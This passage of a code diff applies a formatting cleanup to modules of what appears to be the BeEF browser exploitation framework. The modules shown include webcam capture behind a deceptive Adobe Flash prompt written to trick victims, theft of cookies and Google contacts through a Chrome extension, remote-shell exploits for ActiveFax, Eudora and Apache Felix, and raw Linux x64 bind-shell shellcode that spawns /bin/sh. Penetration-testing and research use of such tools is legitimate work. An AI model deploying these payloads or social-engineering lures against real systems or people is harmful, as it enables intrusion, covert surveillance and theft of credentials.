filename = "#{$home_dir}/screenshot_#{ip}_-_#{timestamp}_#{@datastore['cid']}.png"
File.open(filename, 'wb') do |file|
data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
data = @datastore['results'].gsub(%r{^image=data:image/(png|jpg);base64,}, '')
file.write(Base64.decode64(data))
end
print_info("Browser screenshot saved to '#{filename}'")
BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
rescue => e
BeEF::Core::Logger.instance.register('Zombie', "Browser screenshot saved to '#{filename}'")
rescue StandardError => e
print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
end

12
modules/browser/unhook/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
save content
end
end

80
modules/browser/webcam_flash/module.rb
View File

@@ -6,49 +6,49 @@
require 'base64'
class Webcam_flash < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js')
end
def self.options
configuration = BeEF::Core::Configuration.instance
social_engineering_title = "This website is using Adobe Flash"
social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience."
no_of_pictures = 20
interval = 1000
return [
{'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea' }, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px' }, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px' }
]
social_engineering_title = 'This website is using Adobe Flash'
social_engineering_text = 'In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience.'
no_of_pictures = 20
interval = 1000
[
{ 'name' => 'social_engineering_title',
'description' => 'The title that is shown to the victim.',
'ui_label' => 'Social Engineering Title',
'value' => social_engineering_title,
'width' => '100px' }, {
'name' => 'social_engineering_text',
'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
'ui_label' => 'Social Engineering Text',
'value' => social_engineering_text,
'width' => '300px',
'type' => 'textarea'
}, {
'name' => 'no_of_pictures',
'description' => 'The number of pictures you want to take after the victim clicked "allow".',
'ui_label' => 'Number of pictures',
'value' => no_of_pictures,
'width' => '100px'
}, {
'name' => 'interval',
'description' => 'The interval in which pictures are taken.',
'ui_label' => 'Interval to take pictures (ms)',
'value' => interval,
'width' => '100px'
}
]
end
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
content['picture'] = @datastore['picture'] unless @datastore['picture'].nil?
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

14
modules/browser/webcam_html5/module.rb
View File

@@ -5,12 +5,10 @@
#
require 'base64'
class Webcam_html5 < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
content["image"] = @datastore["image"] if not @datastore["image"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
content['image'] = @datastore['image'] unless @datastore['image'].nil?
save content
end
end

14
modules/browser/webcam_permission_check/module.rb
View File

@@ -6,14 +6,12 @@
class Webcam_permission_check < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
end
end

9
modules/chrome_extensions/execute_tabs/module.rb
View File

@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Execute_tabs < BeEF::Core::Command
def self.options
return [
{'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px'},
{'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px'}
[
{ 'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px' },
{ 'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px' }
]
end
@@ -17,6 +16,4 @@ class Execute_tabs < BeEF::Core::Command
content['Return'] = @datastore['return']
save content
end
end

9
modules/chrome_extensions/get_all_cookies/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_all_cookies < BeEF::Core::Command
def self.options
return [
{'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'}
def self.options
[
{ 'name' => 'url', 'ui_label' => 'Domain (e.g. http://facebook.com)', 'value' => 'default_all' }
]
end
@@ -17,5 +15,4 @@ class Get_all_cookies < BeEF::Core::Command
content['Return'] = @datastore['return']
save content
end
end

2
modules/chrome_extensions/grab_google_contacts/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Grab_google_contacts < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end

2
modules/chrome_extensions/inject_beef/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Inject_beef < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end

2
modules/chrome_extensions/screenshot/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Screenshot < BeEF::Core::Command
def post_execute
content = {}
content['Return'] = @datastore['return']
save content
end
end

8
modules/chrome_extensions/send_gvoice_sms/module.rb
View File

@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options
return [
{'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' =>'textarea', 'width' => '300px'},
{'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px'}
[
{ 'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' => 'textarea', 'width' => '300px' },
{ 'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px' }
]
end
@@ -19,5 +18,4 @@ class Send_gvoice_sms < BeEF::Core::Command
content['Status'] = @datastore['status']
save content
end
end

7
modules/debug/test_beef_debug/module.rb
View File

@@ -4,10 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
[
{ 'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => 'Test string for beef.debug() function', 'type' => 'textarea',
'width' => '400px', 'height' => '50px' }
]
end
@@ -16,5 +16,4 @@ class Test_beef_debug < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
end
end

12
modules/debug/test_cors_request/module.rb
View File

@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_cors_request < BeEF::Core::Command
def post_execute
content = {}
content['response'] = @datastore['response']
@@ -12,12 +11,11 @@ class Test_cors_request < BeEF::Core::Command
end
def self.options
return [
{'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
{'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
[
{ 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{ 'name' => 'url', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px',
'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
{ 'name' => 'data', 'ui_label' => 'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }
]
end
end

22
modules/debug/test_dns_tunnel_client/module.rb
View File

@@ -4,23 +4,25 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_dns_tunnel_client < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
@configuration = BeEF::Core::Configuration.instance
return [
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' },
{'name' => 'data', 'ui_label'=>'Data to send', 'type' => 'textarea', 'value' =>
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac orci. In congue nunc vitae enim pharetra eleifend.',
'width' => '400px', 'height' => '300px'
}
[
{ 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' },
{ 'name' => 'data', 'ui_label' => 'Data to send', 'type' => 'textarea', 'value' =>
'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. ' \
'Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet ' \
'augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum ' \
'sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed ' \
'mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac ' \
'orci. In congue nunc vitae enim pharetra eleifend.',
'width' => '400px', 'height' => '300px' }
]
end
def post_execute
content = {}
content['dns_requests'] = @datastore['dns_requests']
save content
end
end

4
modules/debug/test_get_variable/module.rb
View File

@@ -4,9 +4,7 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_get_variable < BeEF::Core::Command
def self.options
return [{'name' => 'payload_name', 'ui_label'=>'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px'}]
[{ 'name' => 'payload_name', 'ui_label' => 'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px' }]
end
end

2
modules/debug/test_http_redirect/module.rb
View File

@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_http_redirect < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
end
@@ -14,5 +13,4 @@ class Test_http_redirect < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
end
end

24
modules/debug/test_network_request/module.rb
View File

@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_network_request < BeEF::Core::Command
def post_execute
content = {}
content['response'] = @datastore['response']
@@ -15,19 +14,18 @@ class Test_network_request < BeEF::Core::Command
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
hook_path = @configuration.get("beef.http.hook_file")
hook_path = @configuration.get('beef.http.hook_file')
return [
{'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
{'name' => 'method', 'ui_label'=>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },
{'name' => 'port', 'ui_label'=>'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port },
{'name' => 'path', 'ui_label'=>'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path },
{'name' => 'anchor', 'ui_label'=>'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' },
{'name' => 'data', 'ui_label'=>'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' },
{'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width'=>'400px' },
{'name' => 'dataType', 'ui_label'=>'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' },
[
{ 'name' => 'scheme', 'ui_label' => 'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' },
{ 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
{ 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host },
{ 'name' => 'port', 'ui_label' => 'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port },
{ 'name' => 'path', 'ui_label' => 'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path },
{ 'name' => 'anchor', 'ui_label' => 'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' },
{ 'name' => 'data', 'ui_label' => 'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width' => '400px' },
{ 'name' => 'dataType', 'ui_label' => 'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' }
]
end
end

2
modules/debug/test_return_ascii_chars/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_ascii_chars < BeEF::Core::Command
def post_execute
content = {}
content['Result String'] = @datastore['result_string']
save content
end
end

2
modules/debug/test_return_image/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_image < BeEF::Core::Command
def post_execute
content = {}
content['image'] = @datastore['image']
save content
end
end

9
modules/debug/test_return_long_string/module.rb
View File

@@ -4,19 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Test_return_long_string < BeEF::Core::Command
def self.options
return [
{'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'},
{'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'}
[
{ 'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' => '1024' },
{ 'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' => '\u00AE' }
]
end
def post_execute
content = {}
content['Result String'] = @datastore['result_string']
save content
end
end

12
modules/exploits/apache_cookie_disclosure/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_cookies < BeEF::Core::Command
def post_execute
content = {}
content['apache_cookies'] = @datastore['apache_cookies']
save content
end
def post_execute
content = {}
content['apache_cookies'] = @datastore['apache_cookies']
save content
end
end

10
modules/exploits/apache_felix_remote_shell/module.rb
View File

@@ -4,13 +4,12 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_felix_remote_shell < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
lhost = '' if lhost == '0.0.0.0'
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6666' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
@@ -18,7 +17,6 @@ class Apache_felix_remote_shell < BeEF::Core::Command
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

24
modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb
View File

@@ -4,20 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Active_fax_beef_bind < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77'}
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

36
modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/module.rb
View File

@@ -4,27 +4,25 @@
# See the file 'doc/COPYING' for copying permission
#
class Eudora_mail_beef_bind < BeEF::Core::Command
def self.options
def self.options
configuration = BeEF::Core::Configuration.instance
beef_host = "#{configuration.get("beef.http.host")}"
beef_port = "#{configuration.get("beef.http.port")}"
beef_host = configuration.get('beef.http.host').to_s
beef_port = configuration.get('beef.http.port').to_s
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
{ 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
{ 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
{ 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
{ 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' },
{ 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000' },
{ 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host },
{ 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port },
{ 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000' },
{ 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

29
modules/exploits/beefbind/beef_bind_shell/module.rb
View File

@@ -4,22 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Beef_bind_shell < BeEF::Core::Command
def self.options
return [
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/' },
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname' },
{ 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
'store_fields' => ['shellcode'], 'store_data' => [['Windows'], ['Linux']],
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

114
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb
View File

@@ -3,71 +3,65 @@
##
module Msf
module Handler
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
include Msf::Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeefBind
#
# Returns the handler specific string representation
#
def self.handler_type
'beef_bind'
end
include Msf::Handler
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
'bind'
end
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444)
# OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind
)
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Placeholder only
#
def cleanup_handler; end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeefBind)
end
#
# Placeholder only
#
def add_handler(_opts = {})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
#
# Placeholder only
#
def start_handler; end
end
end
#
# Placeholder only
#
def stop_handler; end
end
end
end

137
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
View File

@@ -10,76 +10,73 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [165, 'n']
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" \
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" \
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" \
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" \
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" \
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" \
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" \
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" \
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" \
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" \
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" \
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" \
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" \
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" \
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" \
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" \
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" \
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" \
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" \
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" \
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" \
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" \
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" \
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" \
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" \
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" \
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" \
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" \
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" \
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" \
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" \
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" \
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" \
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" \
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" \
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" \
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" \
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" \
"\xf6\x48\x31\xd2\x0f\x05"
}))
end
def initialize(info = {})
super(merge_info(info,
